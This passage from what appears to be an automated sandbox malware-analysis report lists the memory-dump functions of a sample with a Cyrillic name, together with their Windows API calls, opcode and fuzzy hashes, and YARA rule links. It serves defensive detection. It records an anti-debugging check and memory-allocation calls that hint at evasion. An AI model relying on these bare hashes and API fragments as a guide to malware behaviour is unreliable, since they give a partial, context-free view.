                        • Instruction ID: 6ce1e51ab6e5da21cab8ca4bbece32487fa6d21fd0bd053cca8e0c562b1d1820
                        • Opcode Fuzzy Hash: 075aae34ab59b0ffeee53da522c96feed6e46448f88c36a257e70c1e5ad22e6a
                        • Instruction Fuzzy Hash: 051114B68003099FDB10DF9AD548AEEFBF8EB48720F10842EE559A7300C779A545CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09ACC3F3 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,09ACC3D1,00000800), ref: 09ACC462
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: bbc16717933a57171713d52bcc107be8cc0f1a984b2a70e0d245fa246ae309e9
                        • Instruction ID: 04bb7fc65fd555993fdf0f577979c025d26d722685be516402e8e52ac53a6a98
                        • Opcode Fuzzy Hash: bbc16717933a57171713d52bcc107be8cc0f1a984b2a70e0d245fa246ae309e9
                        • Instruction Fuzzy Hash: D11114B6C003099FDB10CFAAD544AEEFBF5AB88710F10842ED459A7200C779A545CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0848 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                        Download Yara Rule
                        APIs
                        • FindCloseChangeNotification.KERNEL32 ref: 02DD08AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 23e62763f0b5d0b95adb19b476418f2fc1a9933a8819860f06b3bded567936f0
                        • Instruction ID: 0fbb7a59415e862e6c929bf0354d8df80993e867b967f55ebf193dbe70ef3f28
                        • Opcode Fuzzy Hash: 23e62763f0b5d0b95adb19b476418f2fc1a9933a8819860f06b3bded567936f0
                        • Instruction Fuzzy Hash: 2D1134B58003498FDB10DF9AC444BEEBBF4EF89320F208459D528A7341D778A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0791 Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                        Download Yara Rule
                        APIs
                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 02DD0803
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FileView
                        • String ID:
                        • API String ID: 3314676101-0
                        • Opcode ID: 3cd8303a44ac99648919e6b3773c0b3c5875e9fdf2c3ab150020f8b910813ace
                        • Instruction ID: 20ac37b2ffb88a791e71aba299d828a8886ddfe7d3da6d472e5df82b557c4f0a
                        • Opcode Fuzzy Hash: 3cd8303a44ac99648919e6b3773c0b3c5875e9fdf2c3ab150020f8b910813ace
                        • Instruction Fuzzy Hash: 821134B69003489FCB10DF9AC844ADEBFF5EF88310F108419E918A7311C779A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0798 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                        Download Yara Rule
                        APIs
                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 02DD0803
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FileView
                        • String ID:
                        • API String ID: 3314676101-0
                        • Opcode ID: ee147ec8b4cc83fa0740c7d3bfa5fc1a24151ba420c560208827bee4faf6a505
                        • Instruction ID: ff2ea0d6ab68f204fb181dcc23695272243983a9cab55b675a3e7b87b715f655
                        • Opcode Fuzzy Hash: ee147ec8b4cc83fa0740c7d3bfa5fc1a24151ba420c560208827bee4faf6a505
                        • Instruction Fuzzy Hash: DD1102B59006499FCB20DF9AC844ADEBFF8EF88320F208419E518A7350C779A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDCE38 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 02DDCEA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: bb1acb1d666ae24f7e77fed729799fe476b06c798f690eb25836609f7be5a01c
                        • Instruction ID: 5ba06f6801a0239f0207576ba4065fca63485fcd482bf2b780c615ed8edcf7d2
                        • Opcode Fuzzy Hash: bb1acb1d666ae24f7e77fed729799fe476b06c798f690eb25836609f7be5a01c
                        • Instruction Fuzzy Hash: 5911F3B6C006498FDB20DF9AC444ADEFBF5EB88214F10855AD829B7300C379A545CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDB520 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000), ref: 02DDCEA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 8da067ddf61d2e9bf70f1c4507040410495585ffca5eae9afdc8af7b4a515e76
                        • Instruction ID: a291aeb490f2508298942ecf16b2b8ad4f8314ad676b4a1fe7630d485f950922
                        • Opcode Fuzzy Hash: 8da067ddf61d2e9bf70f1c4507040410495585ffca5eae9afdc8af7b4a515e76
                        • Instruction Fuzzy Hash: 0311F3B5C006498FDB20DFAAC444A9EFBF5EB88214F10845AD929B7300D379A945CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD0850 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • FindCloseChangeNotification.KERNEL32 ref: 02DD08AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: b0bdfc9ebd8f5cb1ad7e8f09258ca2890669791b7d948fd77def196175ec9297
                        • Instruction ID: b7763a5a5a0c38ccaa49b7e774438c32fca179c62dc3a1fe39f4f9f6cf88c988
                        • Opcode Fuzzy Hash: b0bdfc9ebd8f5cb1ad7e8f09258ca2890669791b7d948fd77def196175ec9297
                        • Instruction Fuzzy Hash: 201136B18007498FCB10DF9AC544BEEBBF4EF88320F20846AD518A7341D778A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144EDF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • CheckRemoteDebuggerPresent.KERNEL32 ref: 0144EE5C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        • Opcode ID: 37fa5359561e1d3c8fae56af3d8981a7ae125f2355c456f55780287d0c13d9ef
                        • Instruction ID: d1a3b0fde625ea75b001a33a5d929a21c14480f038bc95e04b8525aaf1f8f492
                        • Opcode Fuzzy Hash: 37fa5359561e1d3c8fae56af3d8981a7ae125f2355c456f55780287d0c13d9ef
                        • Instruction Fuzzy Hash: D011F5B58003498FDB20DFA9D585BEEBFF4EF48320F24845AD558A7252C379A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09ACFEA8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: fdbdb8df430ca365b8381b3f57498ffda45af9a4e7c269834bd30416c8bf3f19
                        • Instruction ID: 7874bf18739f931dd35daf756fa9735fbdfdafb4f9315ef8e9bb50e0085fe4f2
                        • Opcode Fuzzy Hash: fdbdb8df430ca365b8381b3f57498ffda45af9a4e7c269834bd30416c8bf3f19
                        • Instruction Fuzzy Hash: E11115B58003488FDB20DFAAD445BDEBFF4EB48714F208459D519A7710C379A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC1AF0 Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Timer
                        • String ID:
                        • API String ID: 2870079774-0
                        • Opcode ID: 7d1231f76adaabbe4769ecda9d2ae155427e29e65aef3a38df3ccfcb64c42dd9
                        • Instruction ID: b54e7ae5470aae710491ff001a2d45c037370a2701477337eaf33ec64892db2f
                        • Opcode Fuzzy Hash: 7d1231f76adaabbe4769ecda9d2ae155427e29e65aef3a38df3ccfcb64c42dd9
                        • Instruction Fuzzy Hash: 201112B58003499FCB10DF9AD889BDEFBF8FB48720F10841AE518A7201C379A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09AC1AE9 Relevance: 1.5, APIs: 1, Instructions: 43timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Timer
                        • String ID:
                        • API String ID: 2870079774-0
                        • Opcode ID: 5ad8c6fe1230f6cd2d3961b5fef693e5e2a84b65b2cfc552061df63e5c3c49a5
                        • Instruction ID: 422491962d4764c67e43cbb00ad4dd5f17588659b4d58d2155eb3a6245357429
                        • Opcode Fuzzy Hash: 5ad8c6fe1230f6cd2d3961b5fef693e5e2a84b65b2cfc552061df63e5c3c49a5
                        • Instruction Fuzzy Hash: B611F2B59003099FCB10DF99D589BDEBBF8EB08710F10840AD518A7211D378A554CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09ACFEB0 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: Initialize
                        • String ID:
                        • API String ID: 2538663250-0
                        • Opcode ID: 962ffd9c62551fbfcb685aa745ebc722743a25c1016216349d05e61120ce205b
                        • Instruction ID: e881bcb4482831b13d551ce0ebb153e4d7aac61a32f113afade74bced7ccfafb
                        • Opcode Fuzzy Hash: 962ffd9c62551fbfcb685aa745ebc722743a25c1016216349d05e61120ce205b
                        • Instruction Fuzzy Hash: E911EEB58003498FCB20DF9AD548BDEBBF8EB49724F20845AE518A7350C379A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD53F0 Relevance: 1.3, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 02DD5460
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 6f2742e43dcd816109326f4b0b64ac977e6819ac45dbdf3c24c38617c075350d
                        • Instruction ID: 4248dca5af46c1a28ff6fe89c3be33fe61fc435f7cb999497862cbba3357e4c2
                        • Opcode Fuzzy Hash: 6f2742e43dcd816109326f4b0b64ac977e6819ac45dbdf3c24c38617c075350d
                        • Instruction Fuzzy Hash: 221123B59006499FCB20DF9AD484ADEBFF4EF49320F208459E558A7311C379A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD5569 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • VirtualFree.KERNELBASE(?,?,?), ref: 02DD55D5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: c175d20ef3247a49f7ea7c223d7c1116a191501763352d0505f751792204c141
                        • Instruction ID: b5f1f025aaa3ce6a5e773b3eb789a09eaddf409c5e64136de88297591810b385
                        • Opcode Fuzzy Hash: c175d20ef3247a49f7ea7c223d7c1116a191501763352d0505f751792204c141
                        • Instruction Fuzzy Hash: EB1134B1900649DFDB10DF9AD884BEEBBF8EB49320F108469E518A7251D338A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD53F8 Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 02DD5460
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 564ecdc61a3244c650d1a3dcb6fb90403e2aae515f4ee4db102ef1675440885d
                        • Instruction ID: dd44e50c622671f713944f0a2c1783e378223882ba4d0f548e53c20d25d6d1c3
                        • Opcode Fuzzy Hash: 564ecdc61a3244c650d1a3dcb6fb90403e2aae515f4ee4db102ef1675440885d
                        • Instruction Fuzzy Hash: 561102B59006499FCB20DF9AD844ADEBBF8EB48320F208419E558A7350C779A944CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD5570 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • VirtualFree.KERNELBASE(?,?,?), ref: 02DD55D5
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 416dcefb5f1403d6be9e6c871dd13bd2f0527525dac9734d18f842454205cbdf
                        • Instruction ID: 040a9b7f001d243ed79c066dc00f9785559d6e30aa6d86bafdfdc54d4d41e09f
                        • Opcode Fuzzy Hash: 416dcefb5f1403d6be9e6c871dd13bd2f0527525dac9734d18f842454205cbdf
                        • Instruction Fuzzy Hash: 871125B19006498FDB10DF9AD844BEEFBF8EF48320F208429E518A3351D738A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013ED478 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81a55babcc85db613ddcc5529fb5f235ef6acbe57bdd1a3d7c56cd02d4a4da42
                        • Instruction ID: 5320450f75829aa1750d1b44d071c13058c81cd8d29a0fb56b1424eae4397ebb
                        • Opcode Fuzzy Hash: 81a55babcc85db613ddcc5529fb5f235ef6acbe57bdd1a3d7c56cd02d4a4da42
                        • Instruction Fuzzy Hash: B8210371504344DFDB05DF58D9C8F26BFA9FB98318F24C569E90A0B2D6C33AD416CAA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013ED564 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ae386da9a0e27178f7d7c77014c534cc0f1e2141700d1a8c193b45ed0bd48c7
                        • Instruction ID: 70c6ec6251348a18da99a3e44a0e7fffd711c154dc6ff58d73f040695a9355fc
                        • Opcode Fuzzy Hash: 7ae386da9a0e27178f7d7c77014c534cc0f1e2141700d1a8c193b45ed0bd48c7
                        • Instruction Fuzzy Hash: ED210671500304DFDB15DF98D9C4F26BFA9FB88328F248569E9090A296C33AD416CAA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013FD01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721248786.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13fd000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9decba1fdb0c09194751d1cb8891bd2a5d9aa727da300911374e3368b430f0d
                        • Instruction ID: a618dffb399af839fdbc9872fe59001cb8148ec9f8a72160d10fcf47d0723402
                        • Opcode Fuzzy Hash: d9decba1fdb0c09194751d1cb8891bd2a5d9aa727da300911374e3368b430f0d
                        • Instruction Fuzzy Hash: 9C21F271604205DFDB15DF68D988F26BF69FB88358F20C56DEA0A4B356C33AD407CA62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013FD006 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721248786.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13fd000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0900113766dd33f78088383e67f57d882b02e3ce273e16330f4962081b4e55fa
                        • Instruction ID: 6a50e7a65b171cd2f9f41076d597876a4afd7c3b8ce19478720326e0051a6340
                        • Opcode Fuzzy Hash: 0900113766dd33f78088383e67f57d882b02e3ce273e16330f4962081b4e55fa
                        • Instruction Fuzzy Hash: 0E219F755093808FDB03CF24D994715BF71EB46218F28C5EED9498F2A7C33A980ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013ED473 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction ID: e7a84c38810322f13639f72e2eed0eebca39fab025bde50a169cac16dfc3ccb4
                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction Fuzzy Hash: 8A11DF72404280CFCB02CF44D9C4B16BFB1FB98318F2485A9D9090B296C336D45ACBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013ED55F Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction ID: d9e9e615b2758f1b6d628f599bb471e323e5e936bed779b19f2e829dd429f4f4
                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                        • Instruction Fuzzy Hash: 0C11AF76504280CFDB16CF54D5C4B16BFB1FB88324F24C5A9D9490B697C33AD45ACBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013ED6EB Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4e1c6f4c4cdbd492528d2c4253a48a8cd52f688e802a23421cc904477a6072d
                        • Instruction ID: 31d41ccb068d160c29d13ab686760e19e0baf33130a8a28b618f6ab2714395ab
                        • Opcode Fuzzy Hash: b4e1c6f4c4cdbd492528d2c4253a48a8cd52f688e802a23421cc904477a6072d
                        • Instruction Fuzzy Hash: 0EF03776240640AFD3208F0AD884C22FBADEBC4634719C15AE84A4B652C231EC41CEA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 013ED6DC Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721188291.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_13ed000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8d08ae645927dc2554d984d0fb7149dad5521b83adf677ed68ffd64058aabb24
                        • Instruction ID: efbbbaf447f40393b151094fe19db193ed3387780c5a639d9d908e2e761bbe4d
                        • Opcode Fuzzy Hash: 8d08ae645927dc2554d984d0fb7149dad5521b83adf677ed68ffd64058aabb24
                        • Instruction Fuzzy Hash: 29F03775104780AFD325CF06C984C62BFF9EF8A6607198489E88A4B762C631FC42CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 0144BFD7 Relevance: 5.5, Strings: 4, Instructions: 505COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$c!Ok$PS7
                        • API String ID: 0-1688611253
                        • Opcode ID: 383895430ea98552f1743a8074374ce42e091dfa9735d3dfea410851806bcf90
                        • Instruction ID: ea3e231e31c66d7d452917ae3e15f3afac16cb2765eee636c1c872328558f4f0
                        • Opcode Fuzzy Hash: 383895430ea98552f1743a8074374ce42e091dfa9735d3dfea410851806bcf90
                        • Instruction Fuzzy Hash: AC02AD76B043258FD754DF6DD8846AEBBE2BF88710F09456EE94ADB364DA30DC018B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144B785 Relevance: 5.4, Strings: 4, Instructions: 357COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$c!Ok$PS7
                        • API String ID: 0-1688611253
                        • Opcode ID: 25f8ad43b42e135eb6433debe987e97eea78cd88ce60817ffe30ef69c2cbb180
                        • Instruction ID: 4bc82cf149a93ed14feb607155ce9dd38866685636c67f45ee1cc52f8e62b392
                        • Opcode Fuzzy Hash: 25f8ad43b42e135eb6433debe987e97eea78cd88ce60817ffe30ef69c2cbb180
                        • Instruction Fuzzy Hash: 72C1C476F002258FD754DF6DD8946AEB7E2FF88660F15446AE94AEB360DA30DC01CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144B708 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$c!Ok$PS7
                        • API String ID: 0-1688611253
                        • Opcode ID: 960eb1e826d1393c6e65d725c08ed5c9dad66838a4d51052c1712ac81f93c31e
                        • Instruction ID: 1cabd3eaf0a8968f10750bde75e7770f9199f2c781cb88b795ba53e6d53f0036
                        • Opcode Fuzzy Hash: 960eb1e826d1393c6e65d725c08ed5c9dad66838a4d51052c1712ac81f93c31e
                        • Instruction Fuzzy Hash: EBB1C336F002259FD754DF6DD8946AEB7E2FBC4220F15456AE94AEB360DA30DC018B81
                        Uniqueness

